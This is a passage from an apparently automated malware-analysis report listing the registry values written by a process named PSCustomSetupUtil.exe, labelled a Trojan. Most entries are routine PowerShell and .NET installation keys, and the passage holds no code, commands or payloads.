"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 37 BB C1 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process PSCustomSetupUtil.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE CE 84 8A 4B 4E 79 06 01 42 DA C1 8C 5D 68 45"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "44 C8 29 C1 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"
The process PSCustomSetupUtil.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E 19 B0 A2 BB EB BF E4 A2 79 5E 59 6F C7 3E 6C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "D0 21 40 C0 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:1924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 50 62 BF 48 1D 64 06 81 5A F9 42 E8 ED D5 D0"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "3C 19 FA C0 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:2196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 1B 63 31 B1 E9 45 92 EA 34 4B D7 FF 9D 1F 61"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:3064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 42 49 A1 AC F5 97 AF D8 6C 2A B6 B6 83 FB C7"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 14 B1 BF AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:2308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 BB 4D 64 5E FF EE F0 D9 2F DD 88 AE 80 9C 44"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 A1 25 CB AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "205"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "206"
"StoreChangeIDFor64BitProcesses" = "184"
"StoreChangeIDFor32BitProcesses" = "205"
The process PSCustomSetupUtil.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 1C 54 50 3A DC B2 53 F9 5F B5 A7 9F A6 BD 6B"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GPowerShell, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "206"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35,MSIL" = "D2 ED 52 CB AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "207"
"StoreChangeIDFor64BitProcesses" = "185"
"StoreChangeIDFor32BitProcesses" = "206"
The process PSCustomSetupUtil.exe:3696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 86 8A C2 BE DF E7 6D AE 37 33 16 73 BA 6A 75"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "1A 26 E3 BF AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:3856 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 88 9F 29 F5 79 12 80 1B 61 63 9A 42 93 37 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "C8 72 10 C0 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "189"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "190"
"StoreChangeIDFor64BitProcesses" = "168"
"StoreChangeIDFor32BitProcesses" = "189"
The process PSCustomSetupUtil.exe:2176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 94 2B 0E C7 49 55 86 DA 21 BF FC 0C 8B D4 16"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "28 A7 4C C2 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "202"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "203"
"StoreChangeIDFor64BitProcesses" = "181"
"StoreChangeIDFor32BitProcesses" = "202"
The process PSCustomSetupUtil.exe:2244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FF 2C 98 28 4B ED 76 73 C8 4C 3F 27 FB 96 4B 5A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process PSCustomSetupUtil.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 6E F0 B4 42 B2 00 1E 28 ED A9 9B A6 A9 43 A9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "FC FA DE C1 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 D5 BF DE 2B D1 CD 25 FC 14 EA 7A 0B 27 DE 27"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "6E 6A 70 C2 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:3992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 48 8A 6D DB 3C 3D D7 6F C2 0D E4 82 32 0E 1F"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "2C BB 9A C0 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 BB 23 01 82 BB 18 A9 52 1E 01 FC 97 50 26 AD"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "38 40 04 CB AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "204"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "205"
"StoreChangeIDFor64BitProcesses" = "183"
"StoreChangeIDFor32BitProcesses" = "204"
The process PSCustomSetupUtil.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A A2 10 4F 26 AA 17 8C C0 05 44 A2 CB 8A 03 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "18 B1 76 CB AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 48 CC FF 48 FC 2E 11 1A 63 31 45 63 D8 42 CD"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL" = "24 0C 6B C0 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "191"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "192"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "170"
"StoreChangeIDFor32BitProcesses" = "191"
The process PSCustomSetupUtil.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C A6 0A EC 9E A9 21 A5 CA 48 76 F7 C5 41 F2 7C"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "C6 FD A3 CB AB F3 D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"
The process PSCustomSetupUtil.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 0E AF DF 7E E4 4F 40 EB 12 10 40 BD DB FF 77"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "42 BE 02 C2 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process PSCustomSetupUtil.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 48 43 BB 4D 22 9F 00 44 91 BB 71 1C 2E E1 3D"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Runtime, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "193"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL" = "DA 07 C8 C0 AB F3 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "194"
"StoreChangeIDFor64BitProcesses" = "172"
"StoreChangeIDFor32BitProcesses" = "193"
The process PSCustomSetupUtil.exe:1868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 53 0C 7F 00 97 51 F2 4E 8E ED 67 C5 49 74 A0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "196"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "197"
"System.Management.Automation.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "F2 14 57 C1 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "175"
"StoreChangeIDFor32BitProcesses" = "196"
The process PSCustomSetupUtil.exe:1284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 6E 48 65 D3 1E CE 0A 46 9C 44 05 11 B7 0E 7D"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
